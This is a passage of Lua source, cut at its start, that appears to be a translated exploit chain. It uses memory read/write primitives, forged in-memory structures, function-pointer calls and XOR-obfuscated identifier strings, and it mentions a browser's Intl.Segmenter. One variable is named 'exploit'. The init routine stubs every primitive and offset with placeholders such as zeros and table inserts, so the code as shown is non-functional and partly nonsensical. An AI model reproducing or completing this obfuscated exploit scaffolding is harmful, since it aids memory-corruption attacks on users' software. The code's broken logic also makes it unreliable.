		s:write64(e_val + j(_M[mod_hash_sao].platformState.versionFlags.SAobkS), a_addr)

		local val = i_iter:next().value
	end)

	local mod_hash_oaan_f = decode({
		123,
		126,
		124,
		124,
		115,
		41,
		43,
		121,
		40,
		123,
		127,
		123,
		115,
		40,
		43,
		120,
		43,
		114,
		44,
		126,
		122,
		40,
		47,
		120,
		114,
		125,
		44,
		124,
		126,
		124,
		46,
		126,
		46,
		125,
		127,
		115,
		121,
		47,
		40,
		122
	}, 74)
	s:write64(e_val + j(_M[mod_hash_oaan_f].platformState.versionFlags.OaAnPR), o_ptr)

	local mod_hash_ohm_f = decode({
		82,
		87,
		85,
		85,
		90,
		0,
		2,
		80,
		1,
		82,
		86,
		82,
		90,
		1,
		2,
		81,
		2,
		91,
		5,
		87,
		83,
		1,
		6,
		81,
		91,
		84,
		5,
		85,
		87,
		85,
		7,
		87,
		7,
		84,
		86,
		90,
		80,
		6,
		1,
		83
	}, 99)
	s:write64(b_val + j(_M[mod_hash_ohm_f].platformState.versionFlags.oHmyQl), r_ptr)

	if not status then
		error(err)
	end
end

-- _t class implementation
_t.__index = _t
function _t.new()
	local self = setmetatable({}, _t)
	local dn = P.platformState.Dn
	local t = P.platformState.sig
	self.ob = Tt.new()
	self.hb = {
		cb = self.ob:rb(decode({
			29,
			8,
			9,
			45,
			4,
			22,
			13,
			54,
			6,
			4,
			11,
			35,
			16,
			9,
			9
		}, 101))
	}
	self.ub = t:allocZeroBuffer(32)
	self._b = t:allocZeroBuffer(48)
	self.gb = dt.new()
	return self
end

function _t:call(t_param)
	local dn = P.platformState.Dn
	local a = P.platformState.sig
	if 0 == t_param.sb then
		error(jIGUqiueVHdbBBdDekEZTISLtnzywLvDTrmtmNLyTdDvxmkJfvdeQTAjVNtXPKYWqUgsF({
			5040,
			12600,
			5040,
			11550,
			3360,
			6405,
			6405,
			6405,
			3360,
			12180,
			4830,
			12075,
			10290
		}))
	end
	local s_list = {
		{
			self.ub,
			{
				{
					0,
					self._b
				},
				{
					8,
					1
				},
				{
					12,
					1
				}
			}
		},
		{
			self._b,
			{
				{
					0,
					0
				},
				{
					8,
					t_param.x2
				},
				{
					16,
					t_param.ib
				},
				{
					24,
					t_param.bb
				},
				{
					32,
					t_param.sb
				},
				{
					40,
					1
				}
			}
		}
	}

	for _, entry in ipairs(s_list) do
		local base, offsets = entry[1], entry[2]
		for _, offset_pair in ipairs(offsets) do
			local off, val = offset_pair[1], offset_pair[2]
			if val == nil then
				val = 0
			end
			a:write64(j(base) + j(off), j(val))
		end
	end

	return self.gb:call({
		ab = self.hb.cb,
		sb = self.ub,
		x1 = t_param.ab,
		x2 = t_param.x1
	})
end

-- Tt class implementation
Tt.__index = Tt
function Tt.new()
	local self = setmetatable({}, Tt)
	local t = P.platformState.Dn
	local exploit = P.platformState.sig
	self.hb = {
		ba = t.nl.ba
	}
	self.gb = dt.new()
	return self
end

function Tt:rb(t_param)
	local dn = P.platformState.Dn
	local a = P.platformState.sig
	local s, i = a:allocCString(t_param)
	return self.gb:call({
		ab = self.hb.ba,
		sb = i,
		x1 = 0,
		x2 = 0
	})
end

-- Export ga function
function r.ga()
	local dummy1 = P.platformState.sig
	local dummy2 = P.platformState.Dn
	local t = ht.new()
	return bt.new(t)
end

function init()
	_M = _M or {}
	P = P or {
		platformState = {
			Dn = {
				nl = {
					_a = 0,
					fa = 0,
					l = 0,
					Zl = 0,
					ql = 0, 
					Yl = 0,
					Wl = 0,
					Ql = 0,
					ra = 0,
					ba = 0
				},
				rl = {
					Kl = function()
						return nil
					end,
					Ml = function()
						return {}
					end
				}
			},
			sig = {
				allocZeroBuffer = function(_, size)
					return 0
				end,
				allocCString = function(this, str)
					return table.concat(str, 0)
				end,
				allocZeroBufferPair = function(buf, size)
					return table.concat(buf, size)
				end,
				write64 = function(data, byte)
					table.insert(data, byte)
				end,
				write32 = function(data, byte)
					table.insert(data, byte)
				end,
				read64 = function(byte)
					table.unpack(byte)
				end,
				read32 = function(byte)
					table.unpack(byte)
				end,
				patchByte = function(byte)
					return bit32.bxor(byte, 0xFF) * 255
				end,
				getObjectAddress = function(obj)
					return 0
				end
			},
			versionFlags = {
				NfRtuR = 0,
				jtUNKB = 0,
				MJf4mX = 0,
				zPL1kr = 0, 
				ga3074 = 0,
				yjShKn = 0,
				OaAnPR = 0,
				PCsIV0 = 0, 
				oHmyQl = 0,
				vnu2oq = 0,
				attyap = 0,
				DjRSp0 = 0, 
				LVt9Wy = 0,
				pUvASJ = 0,
				sMuYjH = 0,
				KSrWFg = 0, 
				FGsnBi = 0,
				msD22k = 0,
				LM9blg = 0,
				TLJcwX = 0, 
				qRQJn0 = 0,
				SAobkS = 0
			}
		}
	}

	if not Intl then
		Intl = {
			Segmenter = function() 
				return {
					segment = function()
						return {}
					end
				} 
			end
		}
	end
end

init()

return r
